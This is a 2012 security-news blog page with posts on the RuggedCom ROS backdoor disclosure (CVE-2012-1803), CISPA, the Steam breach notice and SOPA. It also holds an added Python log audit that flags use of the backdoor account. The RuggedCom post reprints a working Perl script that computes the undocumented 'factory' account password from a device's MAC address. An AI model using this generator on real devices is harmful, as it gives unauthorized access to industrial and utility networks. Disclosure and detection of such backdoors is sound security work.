Your security, networking, programming, and application news source.

Friday, September 21, 2012

[Link] Understanding TTY

www.linusakesson.net
Linus Åkesson (July 25, 2008)

<The TTY demystified>

Tuesday, April 24, 2012

RuggedCom Unresponsive, Rugged Operating System (ROS®) Backdoor Disclosed

A factory backdoor account in RuggedCom's Rugged Operating System (ROS®) has been disclosed. <RuggedCom> is a manufacturer of rugged networking equipment popular in the industrial, utility, and defense sectors. These customers, who often deploy the devices in security-sensitive networks, were recently informed by RuggedCom, which has acknowledged the backdoor. The information was publicly disclosed in part because of RuggedCom's unresponsiveness after that acknowledgement. According to the disclosure, an undocumented account, "factory", which cannot be disabled, is included in all released versions of ROS® with a password generated from the device's MAC address.

<Secunia - Full Disclosure CVE-2012-1803 (April 23, 2012)>

#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";
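Because the account cannot be disabled and its password is derived from a MAC address that is visible to anyone on the segment, the practical defensive move is to treat every authentication event for that account as an alert and to keep management access confined to a known subnet. The following is an added example, not code from the disclosure or from RuggedCom: a small audit over constructed syslog-style lines (the line format, the hostnames, the management prefix 10.0.5. and the protocol field are all assumptions) that flags any use of the "factory" account, rates successful logins higher than failed ones, and notes logins arriving from outside the management network or over a cleartext protocol.

```python
import re

# Constructed sample log lines (not real ROS output; the format is an assumption).
SAMPLE_LOG = """\
Apr 23 09:12:01 ros-sw-01 auth: user 'admin' login OK from 10.0.5.10 (ssh)
Apr 23 09:14:45 ros-sw-01 auth: user 'factory' login OK from 10.0.7.77 (telnet)
Apr 23 09:15:02 ros-sw-02 auth: user 'operator' login FAILED from 10.0.5.10 (ssh)
Apr 23 09:16:30 ros-sw-02 auth: user 'factory' login FAILED from 192.0.2.44 (ssh)
Apr 23 09:17:10 ros-sw-01 auth: user 'factory' login OK from 10.0.5.10 (ssh)
"""

# Assumed line layout: "<timestamp> <host> auth: user '<name>' login <OK|FAILED> from <src> (<proto>)"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) auth: "
    r"user '(?P<user>[^']+)' login (?P<result>OK|FAILED) from (?P<src>\S+) \((?P<proto>\w+)\)$"
)

# Accounts that should never authenticate on a production device.
# "factory" is the undocumented account named in the disclosure above.
UNDOCUMENTED_ACCOUNTS = {"factory"}

# Assumed management subnet prefix; any other source is unexpected.
MANAGEMENT_PREFIX = "10.0.5."


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the layout."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def audit(log_text, watched=UNDOCUMENTED_ACCOUNTS, mgmt_prefix=MANAGEMENT_PREFIX):
    """Return one alert dict per auth event that involves a watched account."""
    alerts = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None or ev["user"] not in watched:
            continue
        reasons = ["undocumented account '%s'" % ev["user"]]
        if ev["result"] == "OK":
            reasons.append("successful login")
        if not ev["src"].startswith(mgmt_prefix):
            reasons.append("source outside management subnet")
        if ev["proto"] == "telnet":
            reasons.append("cleartext protocol")
        # A successful login on an account nobody is supposed to use is the serious case.
        severity = "high" if ev["result"] == "OK" else "medium"
        alerts.append({
            "host": ev["host"],
            "src": ev["src"],
            "result": ev["result"],
            "severity": severity,
            "reasons": reasons,
        })
    return alerts


def summarize(alerts):
    """Count alerts per device so the devices needing attention stand out."""
    counts = {}
    for a in alerts:
        counts[a["host"]] = counts.get(a["host"], 0) + 1
    return counts


if __name__ == "__main__":
    found = audit(SAMPLE_LOG)
    for a in found:
        print(a["severity"].upper(), a["host"], a["src"], a["result"], "; ".join(a["reasons"]))
    print(summarize(found))
```

Run against a real device's syslog feed the regex would need adapting to the actual line layout; the logic itself (watch-list of account names, success versus failure, source subnet, protocol) carries over unchanged.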

Sunday, April 22, 2012

CISPA - US Internet Surveillance Bill

Customers voice their opinion to supporters of the newest dangerous Internet bill, CISPA (H.R. 3523).



Cyber Intelligence Sharing and Protection Act (CISPA), also known as H.R. 3523, is not just another horribly irresponsible SOPA / PIPA. This bill focuses on a real issue, but does so in the most horrible and irresponsible way possible.

CISPA is meant to lay the foundation for private companies and Internet service providers to share information with the US Government about cyber security threats. The main problems are the lack of any real definition of what a threat is, the bypassing of all existing laws that protect against collection and sharing of your personal data by private companies, the lack of restriction on what information can be shared and with whom, the warrant-less unrestricted sharing of data with the NSA, DHS, and other government agencies, and the encouragement of heavy, broad surveillance of citizens.

This bill will directly encourage private companies such as your cellular carrier (Verizon / AT&T), your operating system vendor (Microsoft), your antivirus vendor (Symantec), and your Internet service provider (ISP) to collect huge amounts of your personal data to a level that would previously be illegal. This CISPA authority would override privacy protection laws (such as the protection of your medical records) and local eavesdropping and wiretapping laws, and allow collection of almost any data based on recklessly vague "cybersecurity" purposes. These private companies would be able to collect this data anonymously without ever having to tell you they collected it or what they collected. They would be free to share the data with any company they want, possibly even selling the data, with complete immunity from legal actions such as lawsuits or criminal charges for privacy violations. They would be allowed to dump all this data on any US Government agency without requiring a warrant.

This comes in the wake of the NSA beginning to build the country's biggest spy center in Utah, as well as a recent NSA whistle-blower's claim that the US Government has illegally been engaged in widespread Internet surveillance for quite some time, having intercepted 20 trillion communications, and has copies of "most of your Emails". Again, illegally and therefore with no oversight, I might add.

CISPA (H.R. 3523) is another horribly dangerous and irresponsible bill that will erode all existing personal data and privacy protection laws, and give ALL your data to private companies to use and abuse under the table with complete immunity from legal repercussions.

Verizon disgustingly supports this bill. We call on you, Verizon, to change your stance away from this strong-arm theft and abuse of citizens' personal data!

Verizon's letter of support for CISPA:
http://intelligence.house.gov/sites/intelligence.house.gov/files/documents/Verizon113011.pdf


More Information:

Electronic Freedom Foundation:
http://cyberspying.eff.org/

TIME Magazine:
http://techland.time.com/2012/04/19/5-reasons-the-cispa-cybersecurity-bill-should-be-tossed/



Source: Verizon Wireless Community Forum
April 22, 2012 12:00PM
(The original text has been modified for formatting, linking, and alignment.)

Some other supporters:
  • AT&T
  • Boeing
  • BSA
  • Business Roundtable
  • CSC
  • COMPTEL
  • CTIA - The Wireless Association
  • Cyber, Space & Intelligence Association
  • Edison Electric
  • EMC
  • Exelon
  • Facebook
  • The Financial Services Roundtable
  • IBM
  • Independent Telephone & Telecommunications Alliance
  • Information Technology Industry Council
  • Intel
  • Internet Security Alliance
  • Lockheed Martin
  • Microsoft
  • National Cable & Telecommunications Association
  • NDIA
  • Oracle
  • Symantec
  • TechAmerica
  • US Chamber of Commerce
  • US Telecom - The Broadband Association
  • Verizon

Sunday, February 12, 2012

Steam Warns Users' Personal Info and Credit Card Data Swiped in Last Year's Intrusion


<Steam>, the popular gaming digital rights management platform by <Valve>, pushed an update today containing an "update news" page, which warned of the discovery that personal data was stolen in last year's intrusion. Steam warned that a copy of a backup file about transactions between 2004 and 2008 may have been obtained. Steam assured that no Steam account passwords were included, but said the taken data contained the following user data:

  • User Names
  • EMail Addresses
  • Encrypted Billing Addresses
  • Encrypted Credit Card Information



Steam Update News Text:
February 10th, 2012
Dear Steam Users and Steam Forum Users:

We continue our investigation of last year’s intrusion
with the help of outside security experts. In my last
note about this, I described how intruders had accessed
our Steam database but we found no evidence that the
intruders took information from that database. That is
still the case.

Recently we learned that it is probable that the
intruders obtained a copy of a backup file with 
information about Steam transactions between 2004 and
2008. This backup file contained user names, email
addresses, encrypted billing addresses and encrypted
credit card information. It did not include Steam
passwords.

We do not have any evidence that the encrypted credit
card numbers or billing addresses have been compromised.
However as I said in November it’s a good idea to watch
your credit card activity and statements. And of course
keeping Steam Guard on is a good idea as well.

We are still investigating and working with law
enforcement authorities. Some state laws require a more
formal notice of this incident so some of you will get
that notice, but we wanted to update everyone with this
new information now.

Gabe

Tuesday, January 17, 2012

Fight SOPA and PROTECT IP

This blog would be forced offline if the currently proposed U.S. legislation is passed.

SOPA and PROTECT IP are poorly defined, easily abused, unclear bills proposed to the U.S. House and Senate with unrealistic expectations of Internet technology, which will stifle free speech and innovation while giving the U.S. Government the ability to censor the U.S. Internet and seize U.S. domain names with little reason or limitation. Enforcement of these bills would require the restructuring of many web services which would affect Internet users globally.

These bills threaten a blog like this through vague terminology lacking definitions, such as "committing or facilitating the commission of criminal violations" [of copyright infringement or counterfeit products]. "Facilitation" can often be argued to be simply teaching or demonstrating how to do something. As I interpret this, any website with Hacking/Hacker/Hack in the name or topic would technically be out of compliance automatically and be at the mercy of those enforcing these laws, who could permanently seize associated domain names and possibly further prosecute owners.

These bills create a largely undefined take down process that will clearly leave many types of web services, such as the free blog host here at blogger.com, unable to meet requirements. The absence of any provisions against abuse makes these vague bills a prime target for more abuse than the DMCA takedown request system has historically endured.

Other concerning areas of these bills include provisions against circumvention of such measures, even as the U.S. State Department hypocritically funds the creation of tools for doing just that, to offer citizens under [foreign] "repressive regimes" uncensored access to the Internet.

Please do all you can to educate the public and urge U.S. citizens to contact their government representatives urging them to vote against these reckless bills.


Bill text PROTECT IP (Senate):
http://hdl.loc.gov/loc.uscongress/legislation.112s968

Bill text SOPA - Stop Online Piracy Act (House):
http://hdl.loc.gov/loc.uscongress/legislation.112hr3261

A Layman's examination:
http://blog.reddit.com/2012/01/technical-examination-of-sopa-and.html

History of DMCA takedown abuse:
https://www.eff.org/takedowns

How these bills violate free speech and innovation:
https://www.eff.org/deeplinks/2012/01/how-pipa-and-sopa-violate-white-house-principles-supporting-free-speech

U.S. State department funds tools to circumvent censoring:
http://www.bloomberg.com/news/2011-04-20/u-s-funds-help-democracy-activists-evade-internet-crackdowns.html

I apologize for any inconvenience. We will be returning soon.

SoCo